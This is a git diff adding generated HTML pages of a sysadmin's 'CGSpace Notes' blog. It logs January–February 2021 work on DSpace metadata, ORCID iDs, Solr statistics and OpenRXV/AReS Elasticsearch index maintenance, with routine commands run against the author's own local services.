+<li>We are trying to move series name/number fro m<code>dc.relation.ispartofseries</code> to <code>dcterms.isPartOf</code>, but this uses a special &ldquo;series&rdquo; input type in DSpace&rsquo;s submission form that joins series name and number with a colon (;)
+<ul>
+<li>If we really want to do that we need to add two separate input fields for each</li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-01-25">2021-01-25</h2>
+<ul>
+<li>Finish indexing AReS and adjusting the indexes (see above)</li>
+<li>Merged the changes for the favicon in to the <code>6_x-prod</code> branch</li>
+<li>Meeting with Peter and Abenet about CG Core v2
+<ul>
+<li>We agreed to go ahead with it ASAP and share a list of the changes with Macaroni, Fabio, and others and give them a firm timeline</li>
+<li>We also discussed the CSV export option on DSpace 6 and were surprised to see that it kinda works</li>
+<li>If you do a free-text search it works properly, but if you try to use the metadata filters it doesn&rsquo;t</li>
+<li>I changed the default setting to make it available to any logged in user and will deploy it on CGSpace this week</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-01-26">2021-01-26</h2>
+<ul>
+<li>Email some CIAT users who submitted items with upper case AGROVOC terms
+<ul>
+<li>I will do another global replace soon after they reply</li>
+</ul>
+</li>
+<li>Add CGIAR Impact Areas and UN Sustainable Development Goals (SDGs) to the <code>6x_prod</code> branch</li>
+<li>Looking into the issue with exporting search results in XMLUI again
+<ul>
+<li>I notice that there is an HTTP 400 when you try to export search results containing a filter</li>
+<li>The Tomcat logs show:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>Jan 26, 2021 10:47:23 AM org.apache.coyote.http11.AbstractHttp11Processor process
+INFO: Error parsing HTTP request header
+ Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.
+java.lang.IllegalArgumentException: Invalid character found in the request target [/discover/search/csv?query=*&amp;scope=~&amp;filters=author:(Alan\%20Orth)]. The valid characters are defined in RFC 7230 and RFC 3986
+        at org.apache.coyote.http11.InternalInputBuffer.parseRequestLine(InternalInputBuffer.java:213)
+        at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1108)
+        at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:654)
+        at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:317)
+        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+        at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
+        at java.lang.Thread.run(Thread.java:748)
+</code></pre><ul>
+<li>This actually seems to be a simple issue, as I notice DSpace is escaping the space for some reason:
+<ul>
+<li>The URL that fails is: <a href="https://dspacetest.cgiar.org/discover/search/csv?query=">https://dspacetest.cgiar.org/discover/search/csv?query=</a>*&amp;scope=~&amp;filters=author:(Alan%20Orth)</li>
+<li>The URL that works is: <a href="https://dspacetest.cgiar.org/discover/search/csv?query=">https://dspacetest.cgiar.org/discover/search/csv?query=</a>*&amp;scope=~&amp;filters=author:(Alan%20Orth)</li>
+</ul>
+</li>
+<li>I <a href="https://jira.lyrasis.org/browse/DS-4566">filed a bug</a> on DSpace&rsquo;s issue tracker (though I accidentally hit Enter and submitted it before I finished, and there is no edit function)</li>
+<li>Looking into Linode report that the load outbound traffic rate was high this morning:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grep -E <span style="color:#e6db74">&#39;26/Jan/2021:(08|09|10|11|12)&#39;</span> /var/log/nginx/rest.log | goaccess --log-format<span style="color:#f92672">=</span>COMBINED -
+</span></span></code></pre></div><ul>
+<li>The culprit seems to be the ILRI publications importer, so that&rsquo;s OK</li>
+<li>But I also see an IP in Jordan hitting the REST API 1,100 times today:</li>
+</ul>
+<pre tabindex="0"><code>80.10.12.54 - - [26/Jan/2021:09:43:42 +0100] &#34;GET /rest/rest/bitstreams/98309f17-a831-48ed-8f0a-2d3244cc5a1c/retrieve HTTP/2.0&#34; 302 138 &#34;http://wp.local/&#34; &#34;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36&#34;
+</code></pre><ul>
+<li>Seems to be someone from CodeObia working on WordPress
+<ul>
+<li>I told them to please use a bot user agent so it doesn&rsquo;t affect our stats, and to use DSpace Test if possible</li>
+</ul>
+</li>
+<li>I purged all ~3,000 statistics hits that have the &ldquo;<a href="http://wp.local/%22">http://wp.local/&quot;</a> referrer:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;referrer:http\:\/\/wp\.local\/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
+</span></span></code></pre></div><ul>
+<li>Tag version 0.4.3 of the csv-metadata-quality tool on GitHub: <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.4.3">https://github.com/ilri/csv-metadata-quality/releases/tag/v0.4.3</a>
+<ul>
+<li>I just realized that I never submitted this to CGSpace as a Big Data Platform output</li>
+<li>I used my previous <a href="https://hdl.handle.net/10568/99143">DSpace Statistics API submission</a> as a reference and submitted it to CGSpace</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-01-27">2021-01-27</h2>
+<ul>
+<li>Abenet approved my submission to CGSpace for the CSV metadata quality checker: <a href="https://hdl.handle.net/10568/110997">https://hdl.handle.net/10568/110997</a></li>
+<li>Add SDGs and Impact Areas to the XMLUI item display</li>
+<li>Last week Atmire got back to me about the duplicates in Solr
+<ul>
+<li>The deduplicator appears to be working, but you need to limit the number of records, for example <code>-r 100</code> so it doesn&rsquo;t crash due to memory</li>
+<li>They pointed to a few records <code>solr_update_time_stamp:1605635765897</code> that have hundreds of duplicates which are now gone (still present if you look on the production server)</li>
+<li>I need to try this again before doing it on CGSpace</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-01-28">2021-01-28</h2>
+<ul>
+<li>I did some more work on CG Core v2
+<ul>
+<li>I tested using <code>cg.number</code> twice in the submission form: once for journal issue, and once for series number</li>
+<li>DSpace gets confused and ends up storing the number twice, even if you only enter it in one of the fields</li>
+<li>I suggested to Marie that we use <code>cg.issue</code> for journal issue, since we&rsquo;re already going to use <code>cg.volume</code></li>
+<li>That would free up <code>cg.number</code> for use by series number</li>
+</ul>
+</li>
+<li>I deployed the SDGs, Impact Areas, and favicon changes to CGSpace and posted a note on Yammer for the editors
+<ul>
+<li>Also ran all system updates and rebooted the server (linode18)</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-01-31">2021-01-31</h2>
+<ul>
+<li>AReS Explorer has been down since yesterday for some reason
+<ul>
+<li>First I ran all updates and rebooted the server (linode20)</li>
+<li>Then start a re-index, first deleting the old Elasticsearch temp index:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span># start indexing in AReS
+</span></span></code></pre></div><ul>
+<li>Sent out emails about CG Core v2 to Macaroni Bros, Fabio, Hector at CCAFS, Dani and Tariku</li>
+<li>A bit more minor work on testing the series/report/journal changes for CG Core v2</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2021-02/index.html b/docs/2021-02/index.html
new file mode 100644
index 000000000..8b00c8b55
--- /dev/null
+++ b/docs/2021-02/index.html
@@ -0,0 +1,952 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="February, 2021" />
+<meta property="og:description" content="2021-02-01
+
+Abenet said that CIP found more duplicate records in their export from AReS
+
+I re-opened the issue on OpenRXV where we had previously noticed this
+The shared link where the duplicates are is here: https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6
+
+
+I had a call with CodeObia to discuss the work on OpenRXV
+Check the results of the AReS harvesting from last night:
+
+$ curl -s &#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;
+{
+  &#34;count&#34; : 100875,
+  &#34;_shards&#34; : {
+    &#34;total&#34; : 1,
+    &#34;successful&#34; : 1,
+    &#34;skipped&#34; : 0,
+    &#34;failed&#34; : 0
+  }
+}
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2021-02/" />
+<meta property="article:published_time" content="2021-02-01T10:13:54+02:00" />
+<meta property="article:modified_time" content="2021-08-08T17:07:54+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="February, 2021"/>
+<meta name="twitter:description" content="2021-02-01
+
+Abenet said that CIP found more duplicate records in their export from AReS
+
+I re-opened the issue on OpenRXV where we had previously noticed this
+The shared link where the duplicates are is here: https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6
+
+
+I had a call with CodeObia to discuss the work on OpenRXV
+Check the results of the AReS harvesting from last night:
+
+$ curl -s &#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;
+{
+  &#34;count&#34; : 100875,
+  &#34;_shards&#34; : {
+    &#34;total&#34; : 1,
+    &#34;successful&#34; : 1,
+    &#34;skipped&#34; : 0,
+    &#34;failed&#34; : 0
+  }
+}
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "February, 2021",
+  "url": "https://alanorth.github.io/cgspace-notes/2021-02/",
+  "wordCount": "4143",
+  "datePublished": "2021-02-01T10:13:54+02:00",
+  "dateModified": "2021-08-08T17:07:54+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2021-02/">
+
+    <title>February, 2021 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-02/">February, 2021</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2021-02-01T10:13:54+02:00">Mon Feb 01, 2021</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-02-01">2021-02-01</h2>
+<ul>
+<li>Abenet said that CIP found more duplicate records in their export from AReS
+<ul>
+<li>I re-opened <a href="https://github.com/ilri/OpenRXV/issues/67">the issue</a> on OpenRXV where we had previously noticed this</li>
+<li>The shared link where the duplicates are is here: <a href="https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6">https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6</a></li>
+</ul>
+</li>
+<li>I had a call with CodeObia to discuss the work on OpenRXV</li>
+<li>Check the results of the AReS harvesting from last night:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 100875,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li>Set the current items index to read only and make a backup:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-01
+</span></span></code></pre></div><ul>
+<li>Delete the current items index and clone the temp one to it:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+</span></span></code></pre></div><ul>
+<li>Then delete the temp and backup:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span>{&#34;acknowledged&#34;:true}%
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-01&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Meeting with Peter and Abenet about CGSpace goals and progress</li>
+<li>Test submission to DSpace via REST API to see if Abenet can fix / reject it (submit workflow?)</li>
+<li>Get Peter a list of users who have submitted or approved on DSpace everrrrrrr, so he can remove some</li>
+<li>Ask MEL for a dump of their types to reconcile with ours and CG Core</li>
+<li>Need to tag ILRI collection with license!! For pre-2010 use &ldquo;Other&rdquo; unless a license is already there; 2010-2020 do the ilri content in batches (2010-2015: CC-BY-NC-SA; 2016-onwards: CC-BY);
+<ul>
+<li>ONLY if ILRI / International Livestock Research Institute is the publisher, no journal articles, no book chapters&hellip;</li>
+</ul>
+</li>
+<li>I tried to export the ILRI community from CGSpace but I got an error:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace metadata-export -i 10568/1 -f /tmp/2021-02-01-ILRI.csv
+</span></span><span style="display:flex;"><span>Loading @mire database changes for module MQM
+</span></span><span style="display:flex;"><span>Changes have been processed
+</span></span><span style="display:flex;"><span>Exporting community &#39;International Livestock Research Institute (ILRI)&#39; (10568/1)
+</span></span><span style="display:flex;"><span>           Exception: null
+</span></span><span style="display:flex;"><span>java.lang.NullPointerException
+</span></span><span style="display:flex;"><span>        at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
+</span></span><span style="display:flex;"><span>        at com.google.common.collect.Iterators.concat(Iterators.java:464)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.bulkedit.MetadataExport.&lt;init&gt;(MetadataExport.java:77)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
+</span></span><span style="display:flex;"><span>        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+</span></span><span style="display:flex;"><span>        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+</span></span><span style="display:flex;"><span>        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>        at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+</span></span></code></pre></div><ul>
+<li>I imported the production database to my local development environment and I get the same error&hellip; WTF is this?
+<ul>
+<li>I was able to export another smaller community</li>
+<li>I filed <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=919">an issue</a> with Atmire to see if it is likely something of theirs, or if I need to ask on the dspace-tech mailing list</li>
+</ul>
+</li>
+<li>CodeObia sent a <a href="https://github.com/ilri/OpenRXV/pull/71">pull request</a> with fixes for several issues we highlighted in OpenRXV
+<ul>
+<li>I deployed the fixes on production, as they only affect minor parts of the frontend, and two of the four are working</li>
+<li>I sent feedback to CodeObia</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-02-02">2021-02-02</h2>
+<ul>
+<li>Communicate more with CodeObia about some fixes for OpenRXV</li>
+<li>Maria Garruccio sent me some new ORCID iDs for Bioversity authors, as well as a correction for Stefan Burkart&rsquo;s iD</li>
+<li>I saved the new ones to a text file, combined them with the others, extracted the ORCID iDs themselves, and updated the names using <code>resolve-orcids.py</code>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-02-02-combined-orcids.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/resolve-orcids.py -i /tmp/2021-02-02-combined-orcids.txt -o /tmp/2021-02-02-combined-orcid-names.txt
+</span></span></code></pre></div><ul>
+<li>I sorted the names and added the XML formatting in vim, then ran it through tidy:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ tidy -xml -utf8 -m -iq -w <span style="color:#ae81ff">0</span> dspace/config/controlled-vocabularies/cg-creator-id.xml
+</span></span></code></pre></div><ul>
+<li>Then I added all the changed names plus Stefan&rsquo;s incorrect ones to a CSV and processed them with <code>fix-metadata-values.py</code>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-02-02-fix-orcid-ids.csv 
+</span></span><span style="display:flex;"><span>cg.creator.id,correct
+</span></span><span style="display:flex;"><span>Burkart Stefan: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
+</span></span><span style="display:flex;"><span>Burkart Stefan: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
+</span></span><span style="display:flex;"><span>Stefan  Burkart: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
+</span></span><span style="display:flex;"><span>Stefan Burkart: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
+</span></span><span style="display:flex;"><span>Adina Chain Guadarrama: 0000-0002-6944-2064,Adina Chain-Guadarrama: 0000-0002-6944-2064
+</span></span><span style="display:flex;"><span>Bedru: 0000-0002-7344-5743,Bedru B. Balana: 0000-0002-7344-5743
+</span></span><span style="display:flex;"><span>Leigh Winowiecki: 0000-0001-5572-1284,Leigh Ann Winowiecki: 0000-0001-5572-1284
+</span></span><span style="display:flex;"><span>Sander J. Zwart: 0000-0002-5091-1801,Sander Zwart: 0000-0002-5091-1801
+</span></span><span style="display:flex;"><span>saul lozano-fuentes: 0000-0003-1517-6853,Saul Lozano: 0000-0003-1517-6853
+</span></span><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i 2021-02-02-fix-orcid-ids.csv -db dspace63 -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.creator.id -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">240</span>
+</span></span></code></pre></div><ul>
+<li>I also looked up which of these new authors might have existing items that are missing ORCID iDs</li>
+<li>I had to port my <code>add-orcid-identifiers-csv.py</code> to DSpace 6 UUIDs and I think it&rsquo;s working but I want to do a few more tests because it uses a sequence for the metadata_value_id</li>
+</ul>
+<h2 id="2021-02-03">2021-02-03</h2>
+<ul>
+<li>Tag forty-three items from Bioversity&rsquo;s new authors with ORCID iDs using <code>add-orcid-identifiers-csv.py</code>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat /tmp/2021-02-02-add-orcid-ids.csv
+</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.id
+</span></span><span style="display:flex;"><span>&#34;Nchanji, E.&#34;,Eileen Bogweh Nchanji: 0000-0002-6859-0962
+</span></span><span style="display:flex;"><span>&#34;Nchanji, Eileen&#34;,Eileen Bogweh Nchanji: 0000-0002-6859-0962
+</span></span><span style="display:flex;"><span>&#34;Nchanji, Eileen Bogweh&#34;,Eileen Bogweh Nchanji: 0000-0002-6859-0962
+</span></span><span style="display:flex;"><span>&#34;Machida, Lewis&#34;,Lewis Machida: 0000-0002-0012-3997
+</span></span><span style="display:flex;"><span>&#34;Mockshell, Jonathan&#34;,Jonathan Mockshell: 0000-0003-1990-6657&#34;
+</span></span><span style="display:flex;"><span>&#34;Aubert, C.&#34;,Celine Aubert: 0000-0001-6284-4821
+</span></span><span style="display:flex;"><span>&#34;Aubert, Céline&#34;,Celine Aubert: 0000-0001-6284-4821
+</span></span><span style="display:flex;"><span>&#34;Devare, M.&#34;,Medha Devare: 0000-0003-0041-4812
+</span></span><span style="display:flex;"><span>&#34;Devare, Medha&#34;,Medha Devare: 0000-0003-0041-4812
+</span></span><span style="display:flex;"><span>&#34;Benites-Alfaro, O.E.&#34;,Omar E. Benites-Alfaro: 0000-0002-6852-9598
+</span></span><span style="display:flex;"><span>&#34;Benites-Alfaro, Omar Eduardo&#34;,Omar E. Benites-Alfaro: 0000-0002-6852-9598
+</span></span><span style="display:flex;"><span>&#34;Johnson, Vincent&#34;,VINCENT JOHNSON: 0000-0001-7874-178X
+</span></span><span style="display:flex;"><span>&#34;Lesueur, Didier&#34;,didier lesueur: 0000-0002-6694-0869
+</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-02-02-add-orcid-ids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -d
+</span></span></code></pre></div><ul>
+<li>I&rsquo;m working on the CGSpace accession for Karl Rich&rsquo;s <a href="https://github.com/ilri/vietnam-pig-model-2018">Viet Nam Pig Model 2018</a> and I noticed his ORCID iD is missing from CGSpace
+<ul>
+<li>I added it and tagged 141 items of his with the iD</li>
+</ul>
+</li>
+<li>I <a href="https://hdl.handle.net/10568/111126">uploaded a metadata-only accession</a> for the impact of ILRI book by John McIntire and Delia Grace to CGSpace
+<ul>
+<li>The source code itself is here: <a href="https://github.com/ilri/impact-book">https://github.com/ilri/impact-book</a></li>
+</ul>
+</li>
+<li>A little bit more work on CG Core v2</li>
+</ul>
+<h2 id="2021-02-04">2021-02-04</h2>
+<ul>
+<li>Re-sync CGSpace database and Solr to DSpace Test to start a public test of CG Core v2
+<ul>
+<li>Afterwards I updated Discovery and OAI:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> dspace index-discovery -b
+</span></span><span style="display:flex;"><span>$ dspace oai import -c
+</span></span></code></pre></div><ul>
+<li>Attend Accenture meeting for repository managers
+<ul>
+<li>Not clear what the SMO wants to get out of us</li>
+</ul>
+</li>
+<li>Enrico asked for some notes about our work on AReS in 2020 for CRP Livestock reporting
+<ul>
+<li>Abenet and I came up with the following:</li>
+</ul>
+</li>
+</ul>
+<blockquote>
+<p>In 2020 we funded the third phase of development on the OpenRXV platform that powers AReS. This phase focused mainly on improving the search filtering, graphical visualizations, and reporting capabilities. It is now possible to create custom reports in Excel, Word, and PDF formats using a templating system. We also concentrated on making the vanilla OpenRXV platform easier to deploy and administer in hopes that other organizations would begin using it. Lastly, we identified and fixed a handful of bugs in the system. All development takes place publicly on GitHub: <a href="https://github.com/ilri/OpenRXV">https://github.com/ilri/OpenRXV</a>.</p>
+</blockquote>
+<blockquote>
+<p>In the last quarter of 2020, ILRI conducted a briefing for nearly 100 scientists and communications staff on how to use ARes as a visualization tool for repository outputs and as a reporting tool (<a href="https://hdl.handle.net/10568/110527)">https://hdl.handle.net/10568/110527)</a>. Staff will begin using AReS to generate lists of their outputs to upload in the performance evaluation system to assist in their performance evaluation. The list of publications they will upload from AReS to Performax will indicate the open access status of each publication to help start discussion why some outputs are not open access given the open access policies of the CGIAR.</p>
+</blockquote>
+<ul>
+<li>Call Moayad to discuss OpenRXV development
+<ul>
+<li>We talked about the &ldquo;reporting period&rdquo; (date-based statistics) and some of the issues Abdullah is working on on GitHub</li>
+<li>I suggested that we offer the date-range statistics in a modal dialog with other sorting and grouping options during report generation</li>
+</ul>
+</li>
+<li>Peter sent me the cleaned up series that I had originally sent him in 2020-10
+<ul>
+<li>I quickly applied all the deletions on CGSpace:</li>
+</ul>
+</li>
+</ul>
